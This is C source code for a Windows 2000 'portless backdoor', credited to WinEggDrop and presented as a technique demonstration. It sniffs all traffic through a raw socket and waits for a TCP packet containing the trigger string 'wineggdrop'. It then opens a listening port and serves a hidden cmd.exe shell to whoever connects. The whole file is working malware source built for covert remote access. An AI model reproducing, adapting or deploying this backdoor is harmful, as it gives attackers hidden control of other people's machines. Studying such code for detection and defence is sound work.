//**********************************************************************// Version: V1.0// Coder: WinEggDrop// Date Release: NULL// Purpose: To Demonstrate Some Portless Backdoor Technique// Test PlatForm: Win 2K Pro And Server SP4// Compiled On: LCC 3.0,May Compile On VC++ 6.0(Not Test Yet)//**********************************************************************#include <windows.h>#include <stdio.h>#include <winsock2.h>// Some Structures To Define#define IP_HDRINCL 2#define SIO_RCVALL _WSAIOW(IOC_VENDOR,1)#define MAX_PACK_LEN 65535#define MAX_ADDR_LEN 16#define MAX_HOSTNAME_LAN 255typedef struct _iphdr{ unsigned char h_lenver; unsigned char tos; unsigned short total_len; unsigned short ident; unsigned short frag_and_flags; unsigned char ttl; unsigned char proto; unsigned short checksum; unsigned int sourceIP; unsigned int destIP;}IP_HEADER;typedef struct _tcphdr{ USHORT th_sport; USHORT th_dport; unsigned int th_seq; unsigned int th_ack; unsigned char th_lenres; unsigned char th_flag; USHORT th_win; USHORT th_sum; USHORT th_urp;}TCP_HEADER;// End Of Structure// Global Variablechar SourceIPAddress[MAX_ADDR_LEN]; // Hold The Source IP(This Can Be Used To Do Reverse Connection)int BackDoorPort = 0; // The Port Back Door Will Bind// Function ProtoType Declaration//------------------------------------------------------------------------------------------------------BOOL InitSocket();BOOL DoSniffing();BOOL DecodeIPPack(const char *Buffer,const int BufferSize);BOOL DecodeTCPPack(const char * TCPBuffer,const int BufferSize);BOOL IsWin2KOrAbove();DWORD WINAPI StartBackDoor(LPVOID Para);BOOL GetABackDoorShell(const SOCKET ListenSocket);BOOL SendSocket(const SOCKET ClientSocket,const char *Message);unsigned int ReceiveMessageFromSocket(const SOCKET ClientSocket,char *Buffer,const int BufferSize);//------------------------------------------------------------------------------------------------------// End Of Fucntion ProtoType Declaration// Main Functionint main(int argc,char *argv[]){if (!IsWin2KOrAbove()) // This System Running This Program Is Not Win 2K Or Above{ printf("The Program Must Run Under Win 2k Or Above OS\n"); // Display This Message return -1; // Quit The Program}if (argc == 2) // We Get Argument BackDoorPort = atoi(argv[1]); // Argument One Is The Back Door's Portelse // No Argument BackDoorPort = 1982; // Back Door's Port Will Be Defined On 1982if (!InitSocket()) // Fail To Initize Socket{ printf("Fail To Start Up Winsock\n"); // Display Error Message return -1; // Quit The Program}DoSniffing(); // Do Sniffingreturn 0; // Quit The Program}// End Of Main Function//-------------------------------------------------------------------------// Purpose: To Initize Socket// Return Type: Boolean// Parameters: NULL// This Is Too Simple,I Won't Comment It//-------------------------------------------------------------------------BOOL InitSocket(){WSADATA data;WORD ver;ver = MAKEWORD(2,2);if (WSAStartup( ver, &data )!= 0 ){ return FALSE;}return TRUE;}// End Of InitSocket Function//-------------------------------------------------------------------------// Purpose: To Do None-Driver Sniffing// Return Type: Boolean// Parameters: NULL//-------------------------------------------------------------------------BOOL DoSniffing(){int Length=0; // Variable To Hold The Receive Buffer Lengthchar RecvBuf[MAX_PACK_LEN] = {0}; // Receive BufferSOCKET SocketRaw = INVALID_SOCKET; // Raw SocketSocketRaw = socket(AF_INET , SOCK_RAW , IPPROTO_IP); // Create A Raw Socketif (SocketRaw == INVALID_SOCKET) // Fail To Create A Raw Socket{ printf("Fail To Create A Raw Socket\n"); // Display Error Message return FALSE; // Return False}char FAR name[MAX_HOSTNAME_LAN];if (gethostname(name, MAX_HOSTNAME_LAN) == SOCKET_ERROR) // Fail To Get The Host Name{ printf("Fail To Get Host Name\n"); // Display Error Message closesocket(SocketRaw); // Close The Raw Socket Created return FALSE; // Return False}// The Below Is The NIC Stuffstruct hostent FAR * pHostent;pHostent = (struct hostent * )malloc(sizeof(struct hostent)); // Allocate Hostent BufferpHostent = gethostbyname(name);SOCKADDR_IN sa;sa.sin_family = AF_INET; // That's Internet Relatedsa.sin_port = htons(0); // Any Port Avariable On The OSif (pHostent->h_addr_list[0] != 0) // We Only Check The First NIC{ memcpy(&sa.sin_addr.S_un.S_addr, pHostent->h_addr_list[0], pHostent->h_length); // We Use The First NIC As The Sniffing Subject}else // Well,The First NIC Is Not Valid{ printf("Get Host By Name Fails\n"); // Display Error Message free(pHostent); // Free The Hostent Buffer closesocket(SocketRaw); return FALSE; // Return FALSE;}free(pHostent); // Free The Hostent Bufferif (bind(SocketRaw, (PSOCKADDR)&sa, sizeof(sa)) == SOCKET_ERROR) // Bind The Raw Socket On The First NIC,But Fails{ printf("Fail To Bind\n"); // Display Error Message closesocket(SocketRaw); // Close The Raw Socket return FALSE; // Return False}// Forget About The Below A Few Lines,They Are Just A Static Routine To Do The None_Driver Sniffing(Some Sort Of Must-Have Codes) DWORD dwBufferLen[10] ;DWORD dwBufferInLen = 1 ;DWORD dwBytesReturned = 0 ;if (WSAIoctl(SocketRaw, SIO_RCVALL,&dwBufferInLen, sizeof(dwBufferInLen),&dwBufferLen, sizeof(dwBufferLen),&dwBytesReturned , NULL , NULL) == SOCKET_ERROR){ closesocket(SocketRaw); return FALSE;}while(TRUE) // Sniffing Starts Here With Forever Loop{ memset(RecvBuf, 0, sizeof(RecvBuf)); // Reset The Receive Buffer Length = recv(SocketRaw, RecvBuf, sizeof(RecvBuf), 0); // Try To Receive Data if (Length == SOCKET_ERROR) // Get Error As Receiving Data { printf("Fail To Receive Data\n"); // Display Error Message break; // Leave The Loop } if (DecodeIPPack(RecvBuf,Length)) // Decode The Buffer Received,And The Active Code Is Found { printf("Bingo,The BackDoor Is Activated On Port %d\n",BackDoorPort); //We Are Going To Activate The BackDoor DWORD dwThreadID; HANDLE BackDoorThread = CreateThread(NULL,0,&StartBackDoor,NULL,0,&dwThreadID); // Create The Back Door Thread WaitForSingleObject(BackDoorThread,INFINITE); // Wait Until The Back Door Ends }}closesocket(SocketRaw); // Close The Raw Socketreturn TRUE; // Return}// End Of DoSniffing Function//-------------------------------------------------------------------------// Purpose: To Decode The IP Packer// Return Type: Boolean// Parameters: 1.const char *Buffer -->The Received Buffer// 2.Const int BufferSize -->The Received Buffer Size//-------------------------------------------------------------------------BOOL DecodeIPPack(const char *Buffer,const int BufferSize){IP_HEADER *pIpheader; // IP HeaderSOCKADDR_IN saSource, saDest;pIpheader = (IP_HEADER *)Buffer; // Transfer The Buffer Into IP Header Formint Protocol = pIpheader->proto; // Get The Protocolif ((Protocol != IPPROTO_TCP)) // Not TCP Protocol{ return FALSE; // Return False Since We Only Interest In TCP Protocol}saSource.sin_addr.s_addr = pIpheader->sourceIP;strncpy(SourceIPAddress, inet_ntoa(saSource.sin_addr), MAX_ADDR_LEN); // Get The Source IP(Important For Doing Reverse Connection)int IPLength = sizeof(unsigned long) * (pIpheader->h_lenver & 0xf); // Get The IP Lengthreturn DecodeTCPPack(Buffer+IPLength, BufferSize); // Decode TCP Packer}// End Of DecodeIPPack Function//-------------------------------------------------------------------------// Purpose: To Decode The TCP Packer// Return Type: Boolean// Parameters: 1.const char *TCPBuffer -->The TCP Buffer// 2.Const int BufferSize -->The TCP Buffer Size//-------------------------------------------------------------------------BOOL DecodeTCPPack(const char * TCPBuffer,const int BufferSize){TCP_HEADER * pTcpHeader; // TCP Headerint iSourcePort,iDestPort; // Source Port And DestPortpTcpHeader = (TCP_HEADER * )TCPBuffer; // Transfer The Buffer Into TCP Header Formint TcpHeaderLen = pTcpHeader->th_lenres>>4; // Get The TCP Leader LengthTcpHeaderLen *= sizeof(unsigned long);char * TcpData=TCPBuffer+TcpHeaderLen; // Get The TCP DataiSourcePort = ntohs(pTcpHeader->th_sport); // Get The Source PortiDestPort = ntohs(pTcpHeader->th_dport); // Get The Destination Portif (strstr(TcpData,"wineggdrop")!=NULL) // If The TCP Data Contains A Word "wineggdrop"(The Active Code),Then Bingo{ printf("%s:%d-->Local:%d\r\n",SourceIPAddress,iSourcePort,iDestPort); // Display A Message return TRUE; // Return TRUE(The Back Door Will Be Activated Soon)}return FALSE; // We Didn't Receive An Active Code,Return False}// End Of DecodeTCPPack Function//-------------------------------------------------------------------------// Purpose: To Check The OS// Return Type: Boolean// Parameters: NULL//-------------------------------------------------------------------------BOOL IsWin2KOrAbove(){OSVERSIONINFO OSVersionInfo;OSVersionInfo.dwOSVersionInfoSize = sizeof (OSVERSIONINFO);if (GetVersionEx(&OSVersionInfo)) // Get The OS Version return ((OSVersionInfo.dwPlatformId == VER_PLATFORM_WIN32_NT) && (OSVersionInfo.dwMajorVersion == 5)); // Return Whether It's Win 2k Or Above OS else return FALSE; // Fail To Get The OS Version,Just Return FALSE}// End Of IsWin2KOrAbove Function//--------------------------------------------------------------------------------// Purpose: To Ease The Way To Send Data Through Socket// Return Type: Boolean// Parameters: 1.const SOCKET ClientSocket --> The Socket To Send Message// 2.const char *Message --> Message To Send//--------------------------------------------------------------------------------BOOL SendSocket(const SOCKET ClientSocket,const char *Message){return (send(ClientSocket,Message,strlen(Message),0)!=SOCKET_ERROR);}// End Of SendSocket//--------------------------------------------------------------------------------// Purpose: To Start The Back Door// Return Type: DWORD// Parameters: LPVOID Para --> Can Be AnyThing//--------------------------------------------------------------------------------DWORD WINAPI StartBackDoor(LPVOID Para){struct sockaddr_in srv;SOCKET ListenSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); // Create A TCP Socketif (ListenSocket == INVALID_SOCKET) // Fail To Create A TCP Socket{ printf("Fail To Create A BackDoor Socket\n"); // Display Error Message return -1; // Return}srv.sin_family = AF_INET; // Internet Relatedsrv.sin_addr.s_addr = htonl(INADDR_ANY); // Any Addresssrv.sin_port = htons(BackDoorPort); // Back Door Portif (bind(ListenSocket,(const struct sockaddr *) &srv,sizeof(srv)) == INVALID_SOCKET) // Fail To Bind The Socket { printf("Fail To Bind BackDoor Sokcet\n"); // Display Error Message closesocket(ListenSocket); // Close The Socket return -1; // Return}if (listen(ListenSocket,1) == INVALID_SOCKET) // Fail To Listen On The Back Door's Port{ printf("Fail To Listen\n"); // Display Error Message closesocket(ListenSocket); // Close The Socket return -1; // Return}SOCKET AcceptSocket = accept(ListenSocket, NULL,NULL); // Accepting Connectionsif (AcceptSocket == INVALID_SOCKET) // Fail To Accept Connection{ printf("Fail To Accept Connection\n"); // Display Error Message closesocket(ListenSocket); // Close The Socket return -1; // Return}GetABackDoorShell(AcceptSocket); // Get A CMD Shellclosesocket(AcceptSocket); // Close Accpeted Socketclosesocket(ListenSocket); // Close The Listen Socketreturn 0; // Return}// End Of StartBackDoor Function//--------------------------------------------------------------------------------// Purpose: To To The Shell Stuff// Return Type: Boolean// Parameters: const SOCKET ListenSocket --> The Client Connected Socket//--------------------------------------------------------------------------------BOOL GetABackDoorShell(const SOCKET ListenSocket){char ReceiveBuffer[MAX_PATH + 1]; // The Receive Bufferchar SendBuffer[1024 * 4]; // The Send Bufferunsigned long OutputLength,InputLength; // The Input And Output Length// The Pipe And Some Other SutffHANDLE ClientReadPipe = NULL;HANDLE ClientWritePipe = NULL;HANDLE CmdWritePipe = NULL;HANDLE CmdReadPipe = NULL;SECURITY_ATTRIBUTES sa = {0};STARTUPINFO si = {0};PROCESS_INFORMATION pi = {0};ZeroMemory(ReceiveBuffer,sizeof(ReceiveBuffer));if (GetSystemDirectory(ReceiveBuffer,MAX_PATH)) // Get System Directory{ strcat(ReceiveBuffer,"\\cmd.exe"); // Get The Cmd.exe Full Path}else // Fail To Get System Directory{ SendSocket(ListenSocket,"Fail To Get System Diretory\r\n"); // Display Error Message return FALSE; // Return}// Initize The Stuffsa.nLength = sizeof(sa);sa.bInheritHandle = TRUE;sa.lpSecurityDescriptor = NULL;memset(&pi,0,sizeof(pi));if (!CreatePipe(&ClientReadPipe,&CmdWritePipe,&sa,0)) // Fail To Create Client Read Pipe{ SendSocket(ListenSocket,"Fail To Create Client Read Pipe\r\n"); // Display Error Message goto CleanUP; // Leave}if (!CreatePipe(&CmdReadPipe,&ClientWritePipe,&sa,0)) // Fail To Create Cmd Read Pipe{ SendSocket(ListenSocket,"Fail To Create CMD Read Pipe\r\n"); // Display Error Message goto CleanUP; // Leave}// Reset And Initize Stuffmemset((void *)&si,0,sizeof(si));memset((void *)&pi,0,sizeof(pi));si.cb = sizeof(si);si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;si.wShowWindow = SW_HIDE;si.hStdInput = CmdReadPipe; // Pass The CmdReadPipe To StdInputsi.hStdError = CmdWritePipe; // Pass The CmdWritePipe To StdErrorsi.hStdOutput = CmdWritePipe; // Pass The CmdWritePipe To StdOutputif (!CreateProcess(ReceiveBuffer,NULL,NULL,NULL,1,0,NULL, NULL,&si,&pi)) // Fail To Create A Cmd Shell Process{ SendSocket(ListenSocket,"Fail To Create Process\r\n"); // Display Error Message goto CleanUP; // Leave}while(TRUE) // Shell Commincation Starts Here{ if (!PeekNamedPipe(ClientReadPipe,SendBuffer,sizeof(SendBuffer),&OutputLength,NULL,NULL)) // Fail To Get Data From The Pipe { SendSocket(ListenSocket,"Fail To Peek Name Pipe\r\n"); // Display Error Message break; // Leave } if (OutputLength > 0) // Get Data From The Pipe Successfully { ZeroMemory(SendBuffer,sizeof(SendBuffer)); // Reset The Send Buffer if (!ReadFile(ClientReadPipe,SendBuffer,OutputLength,&OutputLength,0)) //Fail To Read The Data { SendSocket(ListenSocket,"Fail To Read File\r\n"); // Display Error Message break; // Leave } if (send(ListenSocket,SendBuffer,OutputLength,0) == SOCKET_ERROR) // Fail To Send The Data { printf("Fail To Send Buffer\n"); // Display Error Message break; // Leave } } else { ZeroMemory(ReceiveBuffer,sizeof(ReceiveBuffer)); // Reset Receive Buffer InputLength = ReceiveMessageFromSocket(ListenSocket, ReceiveBuffer, sizeof(ReceiveBuffer)); // Receive Input From Client if (InputLength == SOCKET_ERROR) // Fail To Receive Data { printf("Fail To Receive Buffer\n"); // Display Error Message break; // Leave } if (!WriteFile(ClientWritePipe,ReceiveBuffer,InputLength,&InputLength,0)) // Fail To Write The Received Data To The Pipe { printf("Fail To Write File\n"); // Display Error Message break; // Leave } // Leave The Shell if (strnicmp((char*)ReceiveBuffer, "exit\r\n", 6) == 0 || strnicmp((char*)ReceiveBuffer, "exit\r", 5)==0 || strnicmp((char*)ReceiveBuffer, "exit\n", 5)==0) break; }}// Clean All Resource AllocatedCleanUP: if (CmdReadPipe != NULL) CloseHandle(CmdReadPipe); if (CmdWritePipe != NULL) CloseHandle(CmdWritePipe); if (ClientReadPipe != NULL) CloseHandle(ClientReadPipe); if (ClientWritePipe) CloseHandle(ClientWritePipe); return TRUE;}// End Of GetABackDoorShell Function//--------------------------------------------------------------------------------// Purpose: To Receive Data From Socket In A Custom-Defined Way// Return Type: unsigned int// Parameters: 1.const SOCKET ClientSocket --> The Client Connected Socket// 2.char *Buffer --> Buffer To Hold Data Received// 3.const int BufferSize --> The Buffer Size//--------------------------------------------------------------------------------unsigned int ReceiveMessageFromSocket(const SOCKET ClientSocket,char *Buffer,const int BufferSize){ZeroMemory(Buffer,BufferSize); // Reset The Bufferif (BufferSize < 2) // Buffer Size Is Less Then 2{ return 0; // Dump}unsigned int CharacterCount = 0;while(TRUE){ if (CharacterCount >= BufferSize) // The Characters Received Is Bigger Or Equal The Buffer Size { // Give The Buffer An Enter Buffer[BufferSize-2] = '\r'; Buffer[BufferSize-1] = '\n'; return CharacterCount; // Return The Characters Received } if (recv(ClientSocket,Buffer+CharacterCount,1,0) == SOCKET_ERROR) // Fail To Receive Data { return SOCKET_ERROR; // Return Error } if (Buffer[CharacterCount] == '\b') // Back Space Detected { Buffer[CharacterCount] = '\0'; // Skip It if (CharacterCount > 0) // Characters Received Is Bigger Than 0 { CharacterCount--; // Decrease One Character Buffer[CharacterCount] = '\0'; } continue; // Begin A New Loop } if (Buffer[CharacterCount++] == '\n') // Enter Is Detected { return CharacterCount; // Return The Characters Received }}return 0; // We Get Nothing,Return Zero}// End Of ReceiveMessageFromSocket Function// End Of File
